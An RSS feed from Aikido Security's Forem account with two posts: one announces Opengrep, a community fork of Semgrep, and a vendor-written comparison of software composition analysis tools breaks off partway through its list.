<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Aikido Security</title>
    <description>The latest articles on Forem by Aikido Security (@aikidosecurity).</description>
    <link>https://forem.com/aikidosecurity</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Forganization%2Fprofile_image%2F7149%2F0f6c337e-2ebd-4d74-b83b-1de006a5f4d8.png</url>
      <title>Forem: Aikido Security</title>
      <link>https://forem.com/aikidosecurity</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/aikidosecurity"/>
    <language>en</language>
    <item>
      <title>Launching Opengrep | Why we forked Semgrep</title>
      <dc:creator>Felix Garriau</dc:creator>
      <pubDate>Thu, 23 Jan 2025 11:00:02 +0000</pubDate>
      <link>https://forem.com/aikidosecurity/launching-opengrep-why-we-forked-semgrep-2143</link>
      <guid>https://forem.com/aikidosecurity/launching-opengrep-why-we-forked-semgrep-2143</guid>
      <description>&lt;h4&gt;
  
  
  &lt;strong&gt;TL;DR: We’re launching Opengrep, a fork of SemgrepCS, in response to its open-source clampdown.&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Last month, Semgrep &lt;a href="https://semgrep.dev/blog/2024/important-updates-to-semgrep-oss/" rel="noopener noreferrer"&gt;announced&lt;/a&gt; major changes to its OSS project—strategically timed for a Friday, of course ;)&lt;/p&gt;

&lt;p&gt;Since 2017, Semgrep has been a cornerstone of the open-source security community, offering a code analysis engine and rule repository alongside its SaaS product. But their recent moves raise the question: what does “open” really mean?&lt;/p&gt;

&lt;p&gt;Key changes include locking community-contributed rules under a restrictive license and migrating critical features like tracking ignores, LOC, fingerprints, and essential metavariables away from the open project.&lt;/p&gt;

&lt;p&gt;This isn’t surprising—Semgrep has been quietly quitting the open-source engine for some time. The rebranding from “Semgrep OSS” to “Semgrep Community Edition” feels like the final nail in the coffin.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Why?&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Perhaps pressure from VCs, viewing open-source contributions as “cannibalizing” SaaS revenue, or protecting against competition? Semgrep claims the move was to stop vendors from using the rules and engine in competing SaaS offerings. Yet, just yesterday with their “AI” announcement, the founder declared, “the original Semgrep engine is becoming obsolete.”&lt;/p&gt;

&lt;p&gt;Whatever the case, while we respect a competitive spirit, this open-source clampdown does little to stop rival organizations. More than anything, this move undermines community trust—not just in Semgrep, but across open-source projects.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;“This sort of change also harms all similar open-source projects. Every company and every developer now needs to think twice before adopting and investing in an open-source project in case the creator suddenly decides to change the license”... or kneecap the functionality (Opentofu). &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;This pattern is familiar: Elasticsearch’s license shift led AWS to create OpenSearch. The Opentofu movement arose after HashiCorp’s Terraform rugpull. Vendor-led open-source often prioritize commercial interests over community to make it to the “big leagues.”  &lt;strong&gt;And that sucks.&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  So, we’re taking action.
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;We’ve united with 10 direct competitors to launch Opengrep—a coordinated, industry-wide stand to protect open-source and make secure software development a shared standard.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I’m joined by Nir Valtman (CEO, &lt;a href="https://www.arnica.io/" rel="noopener noreferrer"&gt;Arnica&lt;/a&gt;), Ali Mesdaq (CEO, &lt;a href="https://amplify.security/" rel="noopener noreferrer"&gt;Amplify Security&lt;/a&gt;), Varun Badhwar (CEO, &lt;a href="https://www.endorlabs.com/" rel="noopener noreferrer"&gt;Endor Labs&lt;/a&gt;), Aviram Shmueli (CIO, &lt;a href="https://jit.io/" rel="noopener noreferrer"&gt;Jit&lt;/a&gt;), Pavel Furman (CTO, &lt;a href="https://www.kodemsecurity.com/" rel="noopener noreferrer"&gt;Kodem&lt;/a&gt;), Liav Caspi (CTO, &lt;a href="https://www.legitsecurity.com/" rel="noopener noreferrer"&gt;Legit&lt;/a&gt;), Eitan Worcel (CEO, &lt;a href="https://www.mobb.ai/" rel="noopener noreferrer"&gt;Mobb&lt;/a&gt;), and Yoav Alon (CTO, &lt;a href="https://orca.security/" rel="noopener noreferrer"&gt;Orca Security&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;What can you expect? Performance improvements, unlocking pro-only features, extended language supports, migrating critical features back to the engine, and new advancements: windows compatibility, cross-file analysis, the roadmap is long.&lt;/p&gt;

&lt;p&gt;Together, we’re pooling committed capital and OCAML development resources to advance and democratize - even commoditized - static application security testing.&lt;/p&gt;

&lt;p&gt;Because let’s face it—there are more interesting things to build. Finding is one thing... let’s focus on the future, on how we can find and fix security vulnerabilities &lt;del&gt;fast&lt;/del&gt; automatically. Let’s focus on getting devs back to building.&lt;/p&gt;

&lt;p&gt;Read the &lt;a href="https://opengrep.dev/" rel="noopener noreferrer"&gt;Opengrep Manifesto&lt;/a&gt;. Leverage and contribute to Opengrep &lt;a href="https://github.com/opengrep" rel="noopener noreferrer"&gt;today&lt;/a&gt;. To contribute or join as a sponsor, open an issue on &lt;a href="https://github.com/opengrep/opengrep" rel="noopener noreferrer"&gt;https://github.com/opengrep/opengrep&lt;/a&gt;. &lt;/p&gt;

&lt;p&gt;For community &amp;amp; contributors, join the &lt;a href="https://lu.ma/07bivwlz" rel="noopener noreferrer"&gt;open roadmap session&lt;/a&gt; on 20th February.&lt;/p&gt;

&lt;p&gt;Follow along on &lt;a href="https://x.com/opengrep" rel="noopener noreferrer"&gt;X&lt;/a&gt;. &lt;a href="https://www.linkedin.com/company/opengrep/" rel="noopener noreferrer"&gt;Linkedin&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>sast</category>
    </item>
    <item>
      <title>Top 10 Software Composition Analysis (SCA) tools in 2025</title>
      <dc:creator>willem-delbare</dc:creator>
      <pubDate>Thu, 09 Jan 2025 11:30:46 +0000</pubDate>
      <link>https://forem.com/aikidosecurity/top-10-software-composition-analysis-sca-tools-in-2025-3bm8</link>
      <guid>https://forem.com/aikidosecurity/top-10-software-composition-analysis-sca-tools-in-2025-3bm8</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fvisual_28644f9bf81618f7a6de1b8a6f668a70.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fvisual_28644f9bf81618f7a6de1b8a6f668a70.png" alt="Top 10 SCA tools 2025" width="800" height="450"&gt;&lt;/a&gt;Top 10 SCA tools for 2025&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;85% of the code that we use doesn’t come from our own code&lt;/strong&gt;, it comes from our open-source components and dependencies. &lt;strong&gt;This means attackers can know your code better than you do!&lt;/strong&gt; SCA tools are our best line of defense to keep our open-source supply chain secure. &lt;/p&gt;

&lt;p&gt;Software Composition Analysis (SCA) tools, also known as open-source dependency scanning, help us understand the risks we have in our open-source supply chain. From known vulnerabilities, risky licenses or malware hidden in innocent-looking libraries. &lt;/p&gt;

&lt;p&gt;Understanding the composition of your open-source supply chain can be very difficult and SCA tools have become an integral part of the application's security programs. However, they often are riddled with false positives and unnecessary noise so we wanted to break down precisely what to look for in a good SCA tool and review 10 of the market leaders in SCA right now.  &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fframe-1321313977_2a20468c3fa965ed53a527ce930fd951.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fframe-1321313977_2a20468c3fa965ed53a527ce930fd951.png" width="800" height="431"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;How does Software Composition Analysis Work?&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;SCA tools provide an ongoing process for detecting vulnerabilities usually by checking our dependencies and versions against known vulnerabilities. Leaders in SCA however will go further and detect packages using high-risk licenses, conduct malware inspection, and even detect when packages are no longer actively maintained. In addition the approach tools take can differ, typically we see 6 different stages within a SCA tool. &lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;1. OSS Dependency Scanning&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Scans application codebases, build directories, CI/CD pipelines, and package manager files to identify open-source (OS) dependencies.&lt;/li&gt;
&lt;li&gt;Detects both direct dependencies (explicitly declared) and transitive dependencies (inherited).&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;2. Generating a Software Bill of Materials (SBOM)&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Creates an inventory of all OS components with:

&lt;ul&gt;
&lt;li&gt;Component names, versions, locations, suppliers/maintainers&lt;/li&gt;
&lt;li&gt;Associated open-source licenses.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;Often visualizes dependency relationships for better analysis and identifying potential vulnerabilities/conflicts.&lt;/li&gt;

&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;3. Vulnerability Assessment&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Compares the SBOM against databases like NVD, CVE, GitHub Advisory, etc.&lt;/li&gt;
&lt;li&gt;Scanning open-source components for malware not declared in databases&lt;/li&gt;
&lt;li&gt;Uses Common Platform Enumeration (CPE) to map components to known vulnerabilities.&lt;/li&gt;
&lt;li&gt;Regularly updated databases ensure new vulnerabilities are flagged, even for older dependencies.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;4. OSS License Compliance&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Identifies licensing terms for each dependency.

&lt;ul&gt;
&lt;li&gt;Examples: GPL (restrictive, requires sharing modifications) vs. MIT (permissive).&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;Flags license conflicts or violations of internal organizational policies.&lt;/li&gt;

&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;5. Vulnerability Remediation and Auto-Triaging&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Provides actionable recommendations

&lt;ul&gt;
&lt;li&gt;Suggests updates to patched versions (often automatically creating Pull Requests)&lt;/li&gt;
&lt;li&gt;Links to security advisories.&lt;/li&gt;
&lt;li&gt;Offers temporary workarounds.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;Prioritizes vulnerabilities based on severity, exploitability, and runtime impact (auto-triaging).&lt;/li&gt;

&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;6. Continuous Monitoring and Reporting&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Periodically rescans the codebase for emerging vulnerabilities and updates SBOMs.&lt;/li&gt;
&lt;li&gt;Maintains real-time visibility into OS components, their versions, and associated risks.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Top 10 Industry-proven SCA Tools
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;(In alphabetical order)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;If you are looking for SCA tools and don’t know where to start, here is a list of 10 tools we consider to be industry leaders followed by there core features and any disadvantages. &lt;/p&gt;

&lt;h3&gt;
  
  
  Aikido Security
&lt;/h3&gt;

&lt;p&gt;Aikido Security is a developer-focused no-nonsense security platform that combines 9 different scanners into a single platform protecting you from code to code. &lt;br&gt;
Aikido takes a different approach to open-source dependency scanning by prioritizing vulnerabilities based on real-world risk factors instead of relying solely on CVSS scores and also scans for malware, license risks, and inactive packages.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_26349c1a1a36e2482d78fcd38a7698d1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_26349c1a1a36e2482d78fcd38a7698d1.png" alt="Aikido Security SCA" width="800" height="340"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Key Features:&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Risk-Based Vulnerability Prioritization&lt;/strong&gt;: Focuses on exploitable issues, considering data sensitivity and vulnerability reachability, reducing noise from irrelevant CVEs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Advanced Malware Detection&lt;/strong&gt;: Identifies hidden malicious scripts and data exfiltration attempts across major ecosystems like NPM, Python, Go, and Rust.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reachability Analysis&lt;/strong&gt;: Uses a robust engine to identify and prioritize actionable vulnerabilities, eliminating false positives and duplicates.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Automated Remediation Workflows&lt;/strong&gt;: Integrates with tools like Slack, Jira, and GitHub Actions to automate ticketing, notifications, and security policies.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Local CLI Scanner&lt;/strong&gt;: Enables secure, self-hosted scanning for teams handling sensitive data, ensuring compliance with privacy and regulatory standards.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Developer-Centric Design&lt;/strong&gt;: Embeds security directly into workflows, offering clear, actionable guidance tailored to the specific impact on codebases.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Straightforward Pricing&lt;/strong&gt;: Predictable and cost-effective, with savings of up to 50% compared to competitors.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Apiiro
&lt;/h3&gt;

&lt;p&gt;Apiiro combines deep code analysis with runtime behavior monitoring to identify and prioritize exploitable vulnerabilities and open-source risks, providing comprehensive insights and streamlining remediation directly within developer workflows.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_28fd42613a1f1431eddfb01887fc1e7a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_28fd42613a1f1431eddfb01887fc1e7a.png" alt="Apirro SCA tool" width="800" height="552"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Key Features:&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Comprehensive Risk Analysis&lt;/strong&gt;: Evaluates open-source risks beyond CVEs, including unmaintained projects, licensing conflicts, and insecure coding practices.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Penetration Testing Simulations&lt;/strong&gt;: Confirms the exploitability of vulnerabilities based on runtime context to prioritize critical risks.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Risk Graph and Control Plane&lt;/strong&gt;: Maps OSS supply chains and automates workflows, policies, and remediation processes to address risks effectively.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Extended SBOMs (XBOM)&lt;/strong&gt;: Provides a real-time, graph-based view of dependencies and associated risks, including CI/CD and cloud resources.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Developer-Centric Remediation&lt;/strong&gt;: Embeds contextualized alerts and secure version updates into existing developer workflows and tools.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Disadvantages:&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;High Cost&lt;/strong&gt;: Requires a minimum annual contract of $35,400 for 50 seats, which may not be suitable for smaller organizations.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Complex Onboarding&lt;/strong&gt;: Advanced features like risk graphing and XBOMs may necessitate a steep learning curve for new users.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Arnica&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Arnica integrates directly with SCM systems to continuously monitor code changes and dependencies in real-time, providing early detection of vulnerabilities, dynamic inventory management, and actionable remediation guidance to ensure security is embedded into the development lifecycle.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_b82d127cbd05cf7d96ec1ef023af717e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_b82d127cbd05cf7d96ec1ef023af717e.png" alt="Arnica SCA tool" width="800" height="572"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Key Features:&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Pipelineless SCA:&lt;/strong&gt; Eliminates complex pipeline setups by natively integrating with tools like GitHub, GitLab, and Azure DevOps to scan every commit in real-time.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dynamic Dependency Inventory:&lt;/strong&gt; Maintains an up-to-date inventory of all external packages, licenses, and associated risks.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exploitability Prioritization:&lt;/strong&gt; Correlates OpenSSF scorecards and EPSS threat intelligence to calculate exploitability risk scores for each vulnerability.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Contextual Alerting:&lt;/strong&gt; Delivers detailed, prescriptive alerts to relevant stakeholders with step-by-step remediation guidance, including one-click automated fixes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Seamless Feedback Loop:&lt;/strong&gt; Provides immediate security feedback to developers, fostering early and continuous vulnerability management.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Disadvantages:&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Limited Free Features:&lt;/strong&gt; Advanced functionalities require paid plans, starting at $8 per identity per month.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Scaling Costs:&lt;/strong&gt; Costs increase with the number of identities, which may be a concern for large teams or organizations.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Cycode&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Cycode provides end-to-end visibility into open-source vulnerabilities and license violations by scanning application code, CI/CD pipelines, and infrastructure, offering real-time monitoring, automated SBOM generation, and scalable remediation directly integrated into developer workflows.&lt;/p&gt;

&lt;p&gt;​&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_8d174a99dd5952e2933d18dd7b65aaa1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_8d174a99dd5952e2933d18dd7b65aaa1.png" alt="Cycode SCA tool" width="800" height="463"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Key Features:&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Comprehensive Scanning:&lt;/strong&gt; Analyzes application code, build files, and CI/CD pipelines for vulnerabilities and license violations.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Real-Time Monitoring:&lt;/strong&gt; Uses a knowledge graph to identify deviations and potential attack vectors as they occur.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SBOM Management:&lt;/strong&gt; Generates up-to-date SBOMs in SPDX or CycloneDX formats for all dependencies.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Integrated Remediation:&lt;/strong&gt; Provides CVE context, suggested upgrades, one-click fixes, and automated pull requests to accelerate patching.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Scalable Fixes:&lt;/strong&gt; This enables addressing vulnerabilities across repositories in a single action.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Disadvantages:&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Pricing Transparency:&lt;/strong&gt; Requires direct contact for pricing, with estimates suggesting $350 per monitored developer annually.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cost for Larger Teams:&lt;/strong&gt; Pricing may become prohibitive for organizations with many developers.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Deep Factor
&lt;/h3&gt;

&lt;p&gt;DeepFactor combines static scanning with live runtime monitoring to generate comprehensive SBOMs, map dependencies, and identify exploitable risks by analyzing real-world execution patterns and runtime behaviors, offering a contextualized view of vulnerabilities to streamline remediation.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_88fb7e6f6704e261f102ea467464671c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_88fb7e6f6704e261f102ea467464671c.png" alt="Deep Factor" width="800" height="395"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Key Features:&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Runtime Reachability SCA&lt;/strong&gt;: Tracks whether vulnerabilities are exploitable by analyzing executed code paths, control flows, and stack traces.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dynamic SBOM Generation&lt;/strong&gt;: Identifies all dependencies, including undeclared "phantom" components, by combining static and runtime analysis.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Customizable Security Policies&lt;/strong&gt;: Allows organizations to define unique conditional rules and triggers based on their specific security needs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Intelligent Alert Correlation&lt;/strong&gt;: Consolidates related issues into actionable alerts with detailed context, reducing triage noise.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Granular Runtime Insights&lt;/strong&gt;: Observes application behavior across file operations, memory usage, network activity, and more.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Disadvantages:&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Pricing&lt;/strong&gt;: Costs can add up quickly for larger teams, with the all-in-one plan at $65/developer/month.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Limited Language Support&lt;/strong&gt;: Runtime reachability analysis currently supports a subset of languages (PHP, Kotlin, Go, Ruby, Scala), which may not cover all use cases.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Endor Labs
&lt;/h3&gt;

&lt;p&gt;Endor Labs enhances SCA scanning by inspecting source code to build dynamic SBOMs, identify critical vulnerabilities, and detect insecure coding patterns, malware, and inactive dependencies, enabling DevSecOps teams to focus on the most exploitable risks with actionable insights and regulatory compliance support.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_5396ce979bba07d2b2cec5bc46a8ea6a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_5396ce979bba07d2b2cec5bc46a8ea6a.png" alt="Endor Labs (SCA)" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Key Features:&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Granular Dependency Analysis&lt;/strong&gt;: Maps all declared and "phantom" dependencies through source code inspection, not just manifest files.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reachability Analysis&lt;/strong&gt;: Identifies vulnerabilities realistically exploitable in the application’s context to reduce noise.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Endor Score&lt;/strong&gt;: Provides a comprehensive health assessment of OSS packages, factoring in security history, community support, and maintenance.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Automated SBOM and VEX Reports&lt;/strong&gt;: Continuously updates dependency inventories and vulnerability classifications with in-depth reachability context.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Advanced Detection Capabilities&lt;/strong&gt;: Includes rules engines to flag malware, insecure patterns, dependency sprawl, and license violations.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Disadvantages:&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;High Entry Cost&lt;/strong&gt;: Paid plans start at $10,000 annually, making it less accessible for smaller organizations.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Complexity for New Users&lt;/strong&gt;: The comprehensive features and in-depth analysis may require onboarding time for new teams.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Oligo Security
&lt;/h3&gt;

&lt;p&gt;Oligo adopts a unique approach to SCA by monitoring libraries at runtime, in both testing and production, to detect vulnerabilities that traditional scanners miss. Oligo offers actionable fixes based on application context and environment. By leveraging an extensive knowledge base of library behavior profiles and real-time monitoring, Oligo identifies zero-day vulnerabilities, improper library usage, and runtime-specific threats, ensuring DevSecOps teams address critical issues efficiently.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_842424b3a7933ebd3bd13fa1fe13766a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_842424b3a7933ebd3bd13fa1fe13766a.png" alt="Oliga Security (SCA)" width="800" height="495"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Key Features:&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Runtime Monitoring&lt;/strong&gt;: Tracks library behavior during testing and production to detect deviations and vulnerabilities.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;eBPF-Based Profiling&lt;/strong&gt;: Utilizes Linux kernel-level monitoring for unmatched visibility into runtime behavior.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Automated Policies and Triggers&lt;/strong&gt;: Customizable security workflows and real-time alerts via tools like Slack and Jira.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Zero-Day Vulnerability Detection&lt;/strong&gt;: Identifies threats before they are publicly known, preventing zero-day attacks.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Contextual Vulnerability Prioritization&lt;/strong&gt;: Considers environment and library execution state to prioritize threats effectively.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Disadvantages:&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Pricing Transparency&lt;/strong&gt;: Requires a demo to access pricing details; no self-serve or standardized pricing information is available.&lt;/li&gt;
&lt;li&gt;
